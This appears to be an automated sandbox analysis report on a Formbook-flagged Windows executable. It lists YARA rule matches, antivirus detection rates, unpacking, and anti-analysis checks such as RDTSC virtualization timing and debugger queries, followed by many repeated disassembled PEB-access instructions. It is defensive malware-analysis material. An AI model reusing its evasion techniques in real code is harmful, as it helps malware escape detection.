          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.644193470.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.644964411.0000000000600000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.646633088.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@3/0@0/0
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe Virustotal: Detection: 51%
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe Metadefender: Detection: 22%
          Source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe ReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe
          Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe'
          Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000001.00000003.639462821.00000000023F0000.00000004.00000001.sdmp, SecuriteInfo.com.Variant.Zusy.394472.15672.exe, 00000003.00000002.647334486.00000000009C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Variant.Zusy.394472.15672.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Unpacked PE file: 3.2.SecuriteInfo.com.Variant.Zusy.394472.15672.exe.400000.0.unpack .text:ER;.rdata:R; vs .text:ER;

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
          Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Code function: 3_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A296E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exe Code function: 3_2_00A120A0 mov eax, dword ptr fs:[00000030h] 3_2_00A120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F0100 mov eax, dword ptr fs:[00000030h]3_2_009F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E3138 mov ecx, dword ptr fs:[00000030h]3_2_009E3138
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB171 mov eax, dword ptr fs:[00000030h]3_2_009EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EB171 mov eax, dword ptr fs:[00000030h]3_2_009EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A112BD mov esi, dword ptr fs:[00000030h]3_2_00A112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A112BD mov eax, dword ptr fs:[00000030h]3_2_00A112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A112BD mov eax, dword ptr fs:[00000030h]3_2_00A112BD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA129A mov eax, dword ptr fs:[00000030h]3_2_00AA129A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D294 mov eax, dword ptr fs:[00000030h]3_2_00A1D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D294 mov eax, dword ptr fs:[00000030h]3_2_00A1D294
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E52A5 mov eax, dword ptr fs:[00000030h]3_2_009E52A5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F62A0 mov eax, dword ptr fs:[00000030h]3_2_009F62A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AAB2E8 mov eax, dword ptr fs:[00000030h]3_2_00AAB2E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E12D4 mov eax, dword ptr fs:[00000030h]3_2_009E12D4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA1229 mov eax, dword ptr fs:[00000030h]3_2_00AA1229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A229 mov eax, dword ptr fs:[00000030h]3_2_00A0A229
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov eax, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov ecx, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov eax, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E5210 mov eax, dword ptr fs:[00000030h]3_2_009E5210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0B236 mov eax, dword ptr fs:[00000030h]3_2_00A0B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8239 mov eax, dword ptr fs:[00000030h]3_2_009E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8239 mov eax, dword ptr fs:[00000030h]3_2_009E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E8239 mov eax, dword ptr fs:[00000030h]3_2_009E8239
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9B260 mov eax, dword ptr fs:[00000030h]3_2_00A9B260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9B260 mov eax, dword ptr fs:[00000030h]3_2_00A9B260
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A2927A mov eax, dword ptr fs:[00000030h]3_2_00A2927A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E9240 mov eax, dword ptr fs:[00000030h]3_2_009E9240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A74257 mov eax, dword ptr fs:[00000030h]3_2_00A74257
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA138A mov eax, dword ptr fs:[00000030h]3_2_00AA138A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A9D380 mov ecx, dword ptr fs:[00000030h]3_2_00A9D380
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B mov eax, dword ptr fs:[00000030h]3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B mov eax, dword ptr fs:[00000030h]3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1138B mov eax, dword ptr fs:[00000030h]3_2_00A1138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1B390 mov eax, dword ptr fs:[00000030h]3_2_00A1B390
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A12397 mov eax, dword ptr fs:[00000030h]3_2_00A12397
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A103E2 mov eax, dword ptr fs:[00000030h]3_2_00A103E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E3 mov ecx, dword ptr fs:[00000030h]3_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E3 mov ecx, dword ptr fs:[00000030h]3_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A923E3 mov eax, dword ptr fs:[00000030h]3_2_00A923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A153C5 mov eax, dword ptr fs:[00000030h]3_2_00A153C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A653CA mov eax, dword ptr fs:[00000030h]3_2_00A653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A653CA mov eax, dword ptr fs:[00000030h]3_2_00A653CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A0A309 mov eax, dword ptr fs:[00000030h]3_2_00A0A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA131B mov eax, dword ptr fs:[00000030h]3_2_00AA131B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76365 mov eax, dword ptr fs:[00000030h]3_2_00A76365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76365 mov eax, dword ptr fs:[00000030h]3_2_00A76365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A76365 mov eax, dword ptr fs:[00000030h]3_2_00A76365
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009EF358 mov eax, dword ptr fs:[00000030h]3_2_009EF358
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FF370 mov eax, dword ptr fs:[00000030h]3_2_009FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FF370 mov eax, dword ptr fs:[00000030h]3_2_009FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009FF370 mov eax, dword ptr fs:[00000030h]3_2_009FF370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F849B mov eax, dword ptr fs:[00000030h]3_2_009F849B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E649B mov eax, dword ptr fs:[00000030h]3_2_009E649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E649B mov eax, dword ptr fs:[00000030h]3_2_009E649B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A734A0 mov eax, dword ptr fs:[00000030h]3_2_00A734A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A734A0 mov eax, dword ptr fs:[00000030h]3_2_00A734A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A734A0 mov eax, dword ptr fs:[00000030h]3_2_00A734A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A1D4B0 mov eax, dword ptr fs:[00000030h]3_2_00A1D4B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A764B5 mov eax, dword ptr fs:[00000030h]3_2_00A764B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A764B5 mov eax, dword ptr fs:[00000030h]3_2_00A764B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009E1480 mov eax, dword ptr fs:[00000030h]3_2_009E1480
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F34B1 mov eax, dword ptr fs:[00000030h]3_2_009F34B1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F34B1 mov eax, dword ptr fs:[00000030h]3_2_009F34B1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F14A9 mov eax, dword ptr fs:[00000030h]3_2_009F14A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_009F14A9 mov ecx, dword ptr fs:[00000030h]3_2_009F14A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA4496 mov eax, dword ptr fs:[00000030h]3_2_00AA4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00A184E0 mov eax, dword ptr fs:[00000030h]3_2_00A184E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Zusy.394472.15672.exeCode function: 3_2_00AA14FB mov eax, dword ptr fs:[00000030h]3_2_00AA14FB
